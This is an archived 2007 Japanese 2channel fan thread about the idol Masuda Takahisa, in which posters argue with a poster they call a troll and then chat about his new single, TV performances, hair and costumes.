ここ完全に鳥付き2大鏝に乗っ取られてるな…最悪
次スレはスレタイ変える?

150 :ユー&名無しネ:2007/01/30(火) 22:03:02 ID:zcRQHEP1
スレタイ変えても変なハシはどうせついてくるだろうからこのままでいい
なにげにこのスレタ愛着あるし

151 :ユー&名無しネ:2007/01/30(火) 22:24:02 ID:SK72AN3x
それにしてもこの状況は酷いな
自分が嵐だと気がつかないのが一番タチが悪い

152 :ユー&名無しネ:2007/01/30(火) 22:27:42 ID:IYaChfpC
この際ポースレみたく通し番号だけでもいい
次スレまで時間かかりそうだけど

153 :ユー&名無しネ:2007/01/30(火) 22:43:27 ID:pIm/QL0M
通し番号だけの方が逆に目立つよ

154 :ユー&名無しネ:2007/01/30(火) 22:45:14 ID:SK72AN3x
ユニスレにまで迷惑かけるのはやめて欲しいわ
升担がDQN扱いされる

155 :ユー&名無しネ:2007/01/30(火) 22:50:33 ID:SqPgtD6z
え、ここは増田君の本スレですか?
じゃ1人1スレってどうしよう?
ルールを守らないと、安置が増やすならどうしよう?

ネ申な件の皆さんはこのスレを知ってたの?

156 :(・∀・)つ/凵⌒☆ ◆85Hpe6ifO6 :2007/01/30(火) 22:57:07 ID:sKpd/NdY
>155
そだよ
(・∀・)о〇(向こう本(ry)

157 :ユー&名無しネ:2007/01/30(火) 23:03:23 ID:IEAdYXW/
知ってたよ

158 :ユー&名無しネ:2007/01/30(火) 23:04:35 ID:IEAdYXW/
あ、さげわすれた

159 :ユー&名無しネ:2007/01/30(火) 23:08:33 ID:Eb+Ek/o9
しっとりって奴いい加減に汁
升担が頭おかしいと思われるだろ
空気読めよ
おかしいのはオマイだ

160 :ユー&名無しネ:2007/01/30(火) 23:14:09 ID:SK72AN3x
普通に頭悪すぎ

161 :(・∀・)つ/凵⌒☆ ◆85Hpe6ifO6 :2007/01/30(火) 23:20:50 ID:sKpd/NdY
>159-160じゃネ申な件に来るんだな
グイッ(・∀・)っ<゚∀。)∀*)

こっちも何げに動いてるね

162 :ユー&名無しネ:2007/01/30(火) 23:24:35 ID:HRA+IFHR
ヌルーしようにも荒らされ杉

なんで本スレの名前がわからないようにしてあるか考えてほすぃ


163 :ユー&名無しネ:2007/01/30(火) 23:31:31 ID:CsQaYTOE
鏝と厨は糞スレ作ったならそっから出て来るな

誘導イラネし他スレに迷惑かけんな
ハウスッ

164 :(・∀・)つ/凵⌒☆ ◆85Hpe6ifO6 :2007/01/30(火) 23:41:09 ID:sKpd/NdY
争いはいやです><
やめてください

痛いよーすごく痛いよー

165 :しっとり ◆TvH2VJd3Nw :2007/01/30(火) 23:49:51 ID:dPJ/Y9qL
>159さんへ
私が何か悪い事でもしましたか?
あなたに『奴』呼ばわりされる覚えはないんですが!
しかも増田君の担が頭おかしいと思われる?って
意味が全くわかりません!人の事言えるような人なんですか?
おかしいのはオマイ?とにかく人の事を悪く言うのだけはやめてほしい
増田君もがっかりするのもわかる気がする!
かわいそうに!

166 :ユー&名無しネ:2007/01/30(火) 23:51:01 ID:SK72AN3x
マジで謎
何でこんな基地害なレスができるのか

167 :ユー&名無しネ:2007/01/30(火) 23:54:26 ID:HRA+IFHR
>166
とりあえず鏝はNGワードあぼんでおk


168 :ユー&名無しネ:2007/01/30(火) 23:56:09 ID:IYaChfpC
気持ちは分かるが荒らしはヌルー汁
まともな姐さん方は早急に避(ry行けば良いのに

169 :ユー&名無しネ:2007/01/30(火) 23:59:32 ID:SK72AN3x
ヌルーできなかったのは悪かった
でもそっちに行くだけでは解決しないんジャマイカ?

170 :ユー&名無しネ:2007/01/31(水) 00:05:45 ID:DarwuKpu
>169
>168じゃないが
自治や回避策を話し合うにはあっちのがいいと思うよ
こっちはとりあえずヌルーしかない かまって定着させて
伏字で大パした時みたいに板飛んだりしたら他にも迷惑かかる

171 :ユー&名無しネ:2007/01/31(水) 00:25:56 ID:aRJPCAk9
けんかすな!

172 :ユー&名無しネ:2007/01/31(水) 00:37:29 ID:glrYi+K6
基本平和=増田担
    =石鹸担




173 :しっとり ◆TvH2VJd3Nw :2007/01/31(水) 00:45:29 ID:GEraoyQT
あげるからね(^_-)-☆
ポチッってして下さい!
http://user.mojimaru.com/img/image/45bbf0e08ec42.swf

174 :ユー&名無しネ:2007/01/31(水) 03:33:02 ID:svL0egnJ
しっとりさんへ
こちらに移動しましょう
ルールに捕らわれず好き勝手にレスできますよ

増田貴久はネ申な件
http://jbbs.livedoor.jp/music/19265/

175 :ユー&名無しネ:2007/01/31(水) 06:12:22 ID:5N5Q/mrV
升に会いたーい今会いたーい(;´д`)


ここの姐さんらは升に会えるの?
ジヌンはたこやき鯱だからまだ分からんが

176 :しっとり ◆TvH2VJd3Nw :2007/01/31(水) 07:15:33 ID:GEraoyQT
>174さんへ
ありがとうございますm(__)mとりあえず一度ネ申な件に!
ここは増田君の本スレなので言い合いしたくないから
ネ申な件で話し合いしましょう(^O^)/

177 :しっとり ◆TvH2VJd3Nw :2007/02/01(木) 07:37:58 ID:VCPvisZ2
これを見て増田君担がんばりましょう(゜▽゜)
http://img2.mojimaru.com/u/image/imagep.php?rd=45c11a25ec949

178 :ユー&名無しネ:2007/02/02(金) 05:12:28 ID:6JJqk0h5
今朝のスポーツ紙にこんな記事がぁりましたゎ
http://e.pic.to/3dxnw

179 :ユー&名無しネ:2007/02/02(金) 17:11:46 ID:AMWnPDuR
↑グロにつき見るべからず

180 :ユー&名無しネ:2007/02/02(金) 21:05:06 ID:X7Q4uH6z
トン

181 :ユー&名無しネ:2007/02/03(土) 08:40:47 ID:IzAW4qaI
しっとりいい加減消えろよ

182 :ユー&名無しネ:2007/02/03(土) 11:50:57 ID:PXGux/VM
鏝でも書き込みのルールさえ守ってくれれば受け入れるのに
こいつだけはどうしようもないな

183 :しっとり ◆TvH2VJd3Nw :2007/02/03(土) 13:08:32 ID:k6IwLG47
呼びましたか?

184 :ユー&名無しネ:2007/02/03(土) 13:37:38 ID:aYyoVaVc
>183
書き込みばかりしないで自分の文章と全板の文章を比べてみ
もしなにかの違いを見つけたらその違いこそあなたが嫌われた理由だ
もし見つからなかったらもうここに書き込むのはやめて ここはあなたが来る場所じゃない
ネ申な件スレも全体的に浮いてるのでもしpart3やりたいならほかの所に行ってください

つ 【http://jbbs.livedoor.jp/music/19265/

スレ汚れてスマソ
もうヌルーの限界でorz

185 :しっとり ◆TvH2VJd3Nw :2007/02/03(土) 13:49:53 ID:k6IwLG47
>184さんへ
増田君担ですか?>184さんって言葉遣いもきちんとしていて
増田君も喜ぶと思いますよ!

186 :ユー&名無しネ:2007/02/03(土) 14:00:14 ID:xgb5FwMk
しっとりはもうダメポ

救いようがないな…

187 :しっとり ◆TvH2VJd3Nw :2007/02/03(土) 14:23:55 ID:k6IwLG47
>186さんへ
増田君担ですか?まだまだ救えると思いますよ!
本当は増田君担はみーんないい人なんですね!だから増田君もいい人なんですね!
春コンでお会いしましょう♪

188 :ユー&名無しネ:2007/02/03(土) 14:37:52 ID:PXGux/VM
しっとりはわざとやってんじゃね?
ここまで言われても自分の間違いに気がつかないなんて頭おかしい

189 :しっとり ◆TvH2VJd3Nw :2007/02/03(土) 14:58:18 ID:k6IwLG47
>188さんへ
私が間違ってる?頭がおかしい?聞き捨てならない言葉ですね!
自分はどうなんですか?人の事言えるんですか?ちなみに増田君は
ここの書き込みを知っていますよ!増田君の友達が言ってました!

190 :ユー&名無しネ:2007/02/03(土) 15:03:13 ID:PXGux/VM
何でみんなにウザがられてると思う?
書き込みにもルールってものがあるの
それ守らない奴は皆に何を言われても仕方ないよ

191 :しっとり ◆TvH2VJd3Nw :2007/02/03(土) 15:14:28 ID:k6IwLG47
>190さんへ
優しい言葉ですね!私は増田君担がやっぱりいい人ばかりなんだと
改めて確信しました!

192 :ユー&名無しネ:2007/02/03(土) 15:25:28 ID:PXGux/VM
もうだめだこいつwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

193 :ユー&名無しネ:2007/02/03(土) 15:28:22 ID:xgb5FwMk
しっとりはもうこのスレにレスすんな

194 :ユー&名無しネ:2007/02/03(土) 15:28:48 ID:0LL6i1bs
感想ばかり言ってちっとも反省しない軒
いい人ばかり…オマイ以外はなといってやりたい軒
のれんに腕押というう言葉をつくづく実感している軒

195 :しっとり ◆TvH2VJd3Nw :2007/02/03(土) 15:29:15 ID:k6IwLG47
>192さんへ
仲良くしましょうね!

196 :しっとり ◆TvH2VJd3Nw :2007/02/03(土) 15:33:25 ID:k6IwLG47
>193-194さんへ
私はあなたたちと仲良くなれると思います!
どうぞよろしくお願いします!

197 :ユー&名無しネ:2007/02/03(土) 15:40:29 ID:xgb5FwMk
仲良くなりたくナス

ほんとに消えてくれ

198 :しっとり ◆TvH2VJd3Nw :2007/02/03(土) 16:05:24 ID:k6IwLG47
>197さんへ
どーして仲良くなりたくないのですか?増田君担は仲良くしたほうが
増田君自身も喜ぶと思いますよ!

199 :ユー&名無しネ:2007/02/03(土) 16:17:49 ID:PXGux/VM
しっとり…お前が一人でルール違反してるから
周りの人はあんたを非難してるんだよ
お前は荒らしなの
いい加減気がつけ

200 :しっとり ◆TvH2VJd3Nw :2007/02/03(土) 16:36:08 ID:k6IwLG47
>199さんへ
私はあらしではありませんから!くれぐれも間違えないように!
ひとまず今日は帰りますがまた来ます!

201 :ユー&名無しネ:2007/02/03(土) 16:40:03 ID:xgb5FwMk
荒らしと気付いてないとは荒らしよりタチ悪いな…

もう来るな

202 :しっとり ◆TvH2VJd3Nw :2007/02/03(土) 16:44:24 ID:k6IwLG47
>201さんへ
いいえ!また来ます!

203 :ユー&名無しネ:2007/02/03(土) 16:46:01 ID:PXGux/VM
これがゆとり脳か…

204 :ユー&名無しネ:2007/02/03(土) 16:48:34 ID:aYyoVaVc
本スレ回してないのは一番イクナイこと

まともな姐さん達はヌルーして升先生を語ろう
DVD出たら豆の振り付けもやっと習得できるからwktk

205 :ユー&名無しネ:2007/02/03(土) 16:57:56 ID:/EUiGoCb
 _______________
   |
   |★★荒らしは放置が一番キライ!★★
   |
   |●重複スレには誘導リンクを貼って放置!
   | ウザイと思ったらそのまま放置!
   |
   |▲放置された荒らしは煽りや自作自演であなたのレスを誘います!
   | ノセられてレスしたらその時点であなたの負け!
   |
   |■反撃は荒らしの滋養にして栄養であり最も喜ぶことです
   | アラシにエサを与えないで下さい
   |
   |☆枯死するまで孤独に暴れさせておいて
   | ゴミが溜まったら削除が一番です
   |
   |     。
.  Λ Λ  /
  (,,゚Д゚)⊃ ジュウヨウ!
〜/U /
. U U  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄.



206 :ララにゃんζξ・∀・ξζ ◆85Hpe6ifO6 :2007/02/03(土) 17:22:19 ID:Xkmujni4
ζξ・ω・ξζ最初からヌルーしとけばよかったのに
ζξ・∀・ξζ増田担は変な人が多いんだね

(・∀・).。о〇(明日は誰がでるのかな〜?)

207 :ララにゃんζξ・∀・ξζ ◆85Hpe6ifO6 :2007/02/03(土) 17:23:52 ID:Xkmujni4
>205

208 :ユー&名無しネ:2007/02/04(日) 08:04:55 ID:1vdyWE1v
キモ

209 :ユー&名無しネ:2007/02/06(火) 00:50:51 ID:2wSPoiwv
嬉し目汁が…
ヤハリ升の声は甘くてヤサシイ

210 :ユー&名無しネ:2007/02/06(火) 03:21:26 ID:+fTo1t9d
良曲ダナ
升の声よく聞こえてくる
ソロパートも最高だけどユニゾン部分に石鹸の存在を感じて目汁


211 :ユー&名無しネ:2007/02/06(火) 12:12:50 ID:Btf41EwD
新曲!
升の歌声が超甘い
目汁出したよ

212 :ユー&名無しネ:2007/02/06(火) 21:36:34 ID:naLVeXmZ
升の声やっぱスチだ
歌詞見て心配だたが 禿 良曲だな

213 :ユー&名無しネ:2007/02/06(火) 22:00:51 ID:U1vyPLV6
>212
ノシ
自分もあの柔らかい升の声スチだ
キラキラした曲で良曲棚
タモステwktk(*´∀`)

214 :ユー&名無しネ:2007/02/07(水) 01:10:48 ID:I7wNjYwn
大サビとか手を顔の近くまで上げて
想いを込めて歌う姿を想像チタ

215 :ユー&名無しネ:2007/02/08(木) 00:14:42 ID:EGie/2zC
亀だがやっと星目を聞いて禿いい曲だった
が升のソロパートの歌い方チト三宅(2ネーム分からないのでスマソ)に似てると思ったが同感してくれる人いない件orz

216 :ユー&名無しネ:2007/02/08(木) 00:32:48 ID:pMx3e8xb
三宅(2ネーム同じくわからん)の声がわからない(w

217 :ユー&名無しネ:2007/02/08(木) 00:35:08 ID:w0rJ1lsE
升☆カケモの自分は似てないと思うと言っておく

218 :ウツミ:2007/02/08(木) 12:24:47 ID:bLHPfbtL
升担ココに来てね。
新しいtv○○見ましたか?
升カッコかわいい

219 :ユー&名無しネ:2007/02/08(木) 12:33:29 ID:L9bFw4Aw
>218
半年ROMれ

220 :ユー&名無しネ:2007/02/08(木) 13:18:32 ID:EGie/2zC
>218ロムれだがテロガイドは禿モエス
あれを片目誌にやらせたかったな

221 :ユー&名無しネ:2007/02/08(木) 13:28:41 ID:EGie/2zC
>217
自分は「迷ってた」のところチト似てるんだなと

升よ優しく歌うのはいいけど優しくなる=力を抜けるわけじゃないよ升
ミソスープみたいな歌い方はちょうとイイジャマイカ

222 :ユー&名無しネ:2007/02/08(木) 15:33:28 ID:YtzAmKE/
テレガイハァ━━━━━━ *´Д`* ━━━━━━ン!!!

カワユスすぎて死んだ…

223 :ユー&名無しネ:2007/02/08(木) 22:06:13 ID:l+DOO6YX
キモ

224 :ユー&名無しネ:2007/02/09(金) 13:52:35 ID:H7e4xugY
テレガイの升がセクシー!
そして☆メザには升のソロパートがめっちゃ柔らかい

225 :ユー&名無しネ:2007/02/10(土) 13:55:26 ID:eZ386HTY
豚切りスマソだが升はもう
茶髪にしないのか脳(´・ω・`)

226 :ユー&名無しネ:2007/02/10(土) 14:59:19 ID:mdUtYi4U
それより前髪を切ってくれorz

227 :ユー&名無しネ:2007/02/10(土) 19:09:18 ID:t3w9mqf9
>225
茶髪に戻して欲しいな
升は茶髪の方がキャワだと思う

228 :ユー&名無しネ:2007/02/10(土) 19:15:11 ID:aJJF41Wi
自分も茶髪がスチだけど
片目誌を見て黒髪もなかなかキャワだとオモタ

とりあえず前髪切ろうか升

229 :ユー&名無しネ:2007/02/12(月) 12:59:13 ID:EMFnNXqd
君は君だよ

230 :ユー&名無しネ:2007/02/12(月) 18:37:01 ID:a9iPrMLz
少蔵とかで先輩の歌を唄う升を見て
その曲の良さを知る

231 :ユー&名無しネ:2007/02/12(月) 19:47:02 ID:ekW20sq+
武威の新曲を升に歌ってほしい
もちろんあの学ラン風衣装とフリで

232 :ユー&名無しネ:2007/02/12(月) 20:26:33 ID:dA5Q3vUR
>230
禿同
聞きたくなってレンタルしたことある
升が歌うとやさしく聞こえる

233 :ユー&名無しネ:2007/02/12(月) 22:54:09 ID:wu6mA2rV
自分も升のあの丁寧に歌ってる感じの歌い方がスチだ
声に表情がある(*´∀`)

234 :ユー&名無しネ:2007/02/13(火) 20:47:12 ID:zaItonOm
リ`▽´ノリ マメマメマ〜メ♪

235 :ユー&名無しネ:2007/02/15(木) 01:02:49 ID:UouCqAhk
あと3回寝たらタモステでwktk
自分も茶髪な升がスチだ(´∀`*)
けど今は髪色より前髪だな

236 :ユー&名無しネ:2007/02/15(木) 02:35:52 ID:JrhaX8Gd
【今後の介護担当一覧】

近藤真彦→黒柳徹子
東山紀之→森光子
植草克秀→橋田寿賀子
岡本健一→岸恵子
滝沢秀明→細木数子
二宮和也→大竹しのぶ
山下智久→杉田かおる
亀梨和也→小泉今日子
内博貴→菊間千乃

※以上で決定致しましたので、しっかり面倒見てください。

237 :ユー&名無しネ:2007/02/15(木) 22:21:56 ID:gEBwNNoB
明日のタモステwktk(*´∀`)

238 :ユー&名無しネ:2007/02/15(木) 22:23:37 ID:7LsYHvUM
衣装が禿気になる
升だけ升コレか脳

239 :ユー&名無しネ:2007/02/15(木) 22:40:43 ID:2oXc1a87
寧ろ升コレ希望

240 :ユー&名無しネ:2007/02/16(金) 01:10:15 ID:c+DidMbw
女性自身のアオヒゲ升萌
案外ヒゲヅラ似合うカモナ

241 :ユー&名無しネ:2007/02/16(金) 08:02:58 ID:s/nEyx+1
>240
自分はヤダよorz

242 :ユー&名無しネ:2007/02/16(金) 21:17:58 ID:WSLzQUQO
タモステ升ビズ最高!
髪色もイイカンジ

243 :ユー&名無しネ:2007/02/16(金) 23:39:59 ID:iGIij6Jf
髪染めてた脳
大サビ後の笑顔がキャワだったな

244 :ユー&名無しネ:2007/02/16(金) 23:58:53 ID:yH5dphDv
大サビ後に升を大画面で映してくれたタモステカメラマンGJ!
キャワすぎて仕方なかった
サヤエンイントロの腹チラもキャワだた(w

245 :ユー&名無しネ:2007/02/17(土) 00:06:28 ID:KeXkhHD5
升が楽しそうでなによりだ
キャワだったし衣装もヨカタ
明日からツアーwktk

246 :ユー&名無しネ:2007/02/17(土) 00:46:26 ID:tWtZWYYN
今日もシャカリキにキャワだった升に萌(*´∀`)
サヤエンの腹チラもオチサビ後の笑顔もウマーだったな
しかしCM入りの時のカメラサービスにはワロタ(w

247 :ユー&名無しネ:2007/02/17(土) 10:48:42 ID:rtStijGC
タモステの升ヤバス!
シャカリキだたな
茶髪も腹チラも笑顔も萌(*´∀`)

248 :ユー&名無しネ:2007/02/17(土) 11:19:12 ID:PdHKF7tL
タモステ本当にキャワキャワだたな
自分も升ソロ後のあの笑顔が眩しすぎて目に焼き付いて離れない(´∀`*)
石鹸復活が本当に嬉しいんだなぁ升は
喜びが伝わってきたよ

249 :ユー&名無しネ:2007/02/17(土) 17:02:59 ID:1+y9YazM
升ソロ衣裳が体操のお兄さん風味

250 :ユー&名無しネ:2007/02/17(土) 20:46:33 ID:rtStijGC
>249
kwsk

251 :ユー&名無しネ:2007/02/17(土) 23:30:01 ID:ZQwkLo02
升ソロ曲キャワだた(*´∀`)
水色のパーカーで他麺からカバエエて言われてた
シャカリキダンス健在で歌詞もキャワ

252 :ユー&名無しネ:2007/02/18(日) 02:25:47 ID:eb2NNfDe
>251
d!早くみたい

253 :ユー&名無しネ:2007/02/18(日) 02:27:10 ID:eb2NNfDe
久々すぎて緑スマソ

254 :ユー&名無しネ:2007/02/18(日) 02:34:29 ID:K163Y0PE
>251
パーカーというか安っぽいジャージに見えたのは自分だけか脳(w

フライングしながら足バタバタしたりブランコブンブンこいでるのが果てしなくキャワだた(*´∀`)

255 :ユー&名無しネ:2007/02/18(日) 13:17:30 ID:OjSFd1zn
>254 ノシ
上下水色ジャージの背中にスパンコールびっしりでビクーリ(w
スパンコールはかぼちゃが描かれてるように見えたが

256 :ユー&名無しネ:2007/02/18(日) 14:22:33 ID:KmHsLo3c
ttp://jbbs.livedoor.jp/music/8282/

257 :ユー&名無しネ:2007/02/18(日) 14:46:09 ID:ktfwtk/e
今日の少蔵wktk
リ`▽´ノリ人(´∀`*)

258 :ユー&名無しネ:2007/02/18(日) 19:52:17 ID:K163Y0PE
プレミアムで升が麺に振り付け教えてたな(w
麺愛にも書いてあったけど升振りだけは忘れないんだな(*´∀`)

259 :ユー&名無しネ:2007/02/19(月) 18:06:40 ID:xQvPeiGL
小蔵サヤエンの始まる前
℃が升呼んでるように聞こえたのは自分ダケ?

260 :ユー&名無しネ:2007/02/19(月) 21:26:31 ID:1nX+OTcX
>259
自分も聞こえたよ
升センセに振り付け教えてほしかったんだろうね(*´∀`)

261 :ユー&名無しネ:2007/02/19(月) 21:57:53 ID:7yG4dHbt
名前呼んでる?自分聞こえナスorz

262 :ユー&名無しネ:2007/02/19(月) 22:06:25 ID:UuNg141S
>259
自分も聞こえたとオモー

>261
IDの数字が升の誕生日(*´∀`)

263 :ユー&名無しネ:2007/02/20(火) 00:55:52 ID:8iVvAMFM
>262
ほんとだ升誕生日だ(*´∀`)
もう変っちゃったけど

wsで升の水色ジャージ見れた
ぎゅって抱きしめるフリもキャワだね

264 :ユー&名無しネ:2007/02/20(火) 22:47:15 ID:QKPEmK+s
>263
そうなのか
禿キャワキャワだな(*´∀`)

265 :ユー&名無しネ:2007/02/21(水) 08:26:16 ID:Q5fAffcw
姐サン裏山orz

自分wsで一度も見てない。
これからws見るようにするよ、、

キャワキャワ升ー見ーたーい

266 :ユー&名無しネ:2007/02/21(水) 12:41:57 ID:Pe8oU/KC
升ソロはやらないと思うけど金曜の2時ッチャオの1週間まとめの芸能コーナーでもまた流れるかも
土日のWSもチェックしたほうがいいよ


267 :ユー&名無しネ:2007/02/21(水) 13:42:05 ID:Q5fAffcw
d!

テレビの前で待ち構えるよ!
それまでタモステとプレミアムでジヌン繋げとくー

268 :ユー&名無しネ:2007/02/21(水) 17:27:48 ID:vejzKwZj
豚切りスマソ
今月の☆誌はまだ
升の髪は黒髪?

269 :ユー&名無しネ:2007/02/21(水) 21:33:15 ID:wWIa/RhF
ここはいつからゴミ付きもジヌンも書き込んでいい事になったんだ?

270 :ユー&名無しネ:2007/02/21(水) 22:12:59 ID:OzTWFBQK
スルーしてるじゃないか

271 :ユー&名無しネ:2007/02/21(水) 23:09:51 ID:z3oBlRE0
>269
おまいみたいのに仕切られる筋合いはないから

272 :ユー&名無しネ:2007/02/22(木) 12:33:19 ID:KslcQQTO
>268
☆誌買って来たノシ
まだ黒髪だったよ
全員でわいわいしててキャワ(*´∀`)

273 :ユー&名無しネ:2007/02/22(木) 15:38:45 ID:5CRFRSaQ
>272
d!
禿楽しみだ(*´∀`)

274 :ユー&名無しネ:2007/02/23(金) 00:07:31 ID:5Mv54h3j
歩誌カワユス!おしゃれ衣装隊長乙!

275 :ユー&名無しネ:2007/02/23(金) 14:51:37 ID:u3iOwVbl
新曲のジャケ写の升もカワユス!
升の首にマフラー巻かせたらネ申!

276 :ユー&名無しネ:2007/02/23(金) 15:12:55 ID:x6QpsNcH
>275
kwsk

277 :ユー&名無しネ:2007/02/23(金) 15:26:57 ID:u3iOwVbl
つJE

278 :ユー&名無しネ:2007/02/23(金) 16:03:40 ID:x6QpsNcH
>277
d!

45 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)